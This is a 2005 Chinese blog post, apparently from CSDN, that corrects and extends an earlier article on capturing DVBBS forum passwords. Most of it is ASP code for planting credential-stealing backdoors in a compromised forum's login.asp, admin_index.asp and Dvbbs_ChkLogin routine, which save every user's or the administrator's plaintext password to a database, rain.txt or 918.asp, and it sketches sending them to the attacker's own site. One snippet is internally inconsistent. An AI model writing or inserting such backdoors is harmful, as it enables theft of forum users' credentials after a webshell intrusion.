关于"截取动网BBS的用户密码"一文的校正

原创 2005年04月24日 13:44:00

原文说:要在它验证的前面得到它的密码,所以,我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
   set con=server.createobject("adodb.connection")
   DBPath = Server.MapPath("example.mdb")
   con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
  
  
  
   set rstmp=server.createobject("adodb.recordset")
  
   username = Request.form("username")
   password = Request.form("password")
  
   str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
   con.execute(str)

这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)




写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法:

方法一:login.asp中Case "chk"下:
   on error resume next
   dim rain
   set lP=server.CreateObject("Adodb.Stream")
   rain.Open
   rain.Type=2
   rain.CharSet="gb2312"
   rain.LoadFromFile server.mapPath("918.asp")
   rain.Position=lp.Size
   rain.writetext now&request("username")&"text:"&request("password")&chr(10)
   rain.SaveToFile server.mapPath("918.asp"),2
   rain.Close
   set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:


  在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高

云服务器Windows Server2012 配置动网BBS服务器

一、先决条件 本文内容必须先配置IIS服务器,可参考本人博文:http://blog.csdn.net/luchengtao11/article/details/72283237 二、安装动网BB...

bbs上的资料(修改Oracle10g密码)

忘记是在哪个bbs上看到的资料,如果你不小心忘记了Oracle 10g的密码,那么的方法决定能帮到你!!! 1.开始-->运行-->cmd:  2.sqlplus /nolog   ...

今天看到有人疯狂地在猜我BBS帐号的密码,主ID不说,连马甲也被尝试

不知道发生了什么状况

满足互动、发出用户民意的BBS论坛

满足互动、发出用户民意的BBS论坛BBS,全称为Bulletin Board System(电子公告板)或者Bulletin Board Service(公告板服务)。论坛是Internet上的一种电...

课程设计 BBS-PENTA用户手册

软件工程 BBS论坛 用户手册

一文读懂「用户行为数据」的采集、分析和应用

越来越多的企业已开始挖掘用户行为数据的商业价值,利用行为数据进行精准有效的数字营销。以科技金融行业为例,某知名企业的数据表明:用户行为数据的效力是金融数据的4倍。   一、企业的数据来源 ...

iis +asp.net 4 输入网提示用户和密码

IIS浏览ASP(ASP.NET)时要输入用户名和密码的问题 (一)更改Active Directory中IWAM_MYSERVER账号的密码 因IWAM账号的密码由系统控制,随机产生,...

BBS3000 To 动网论坛(7.0) win32版

  • 2005年12月27日 09:38
  • 295KB
  • 下载

紫色Goshow皮肤For 动网BBS7.0sp2

  • 2005年12月27日 09:38
  • 607KB
  • 下载

新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏(大众点评网为例)

简要描述: 新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏(大众点评网为例) 详细说明: 重置密码要先从敏感信息泄漏开始 code 区域 POST /user/userl...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:关于"截取动网BBS的用户密码"一文的校正
举报原因:
原因补充:

(最多只允许输入30个字)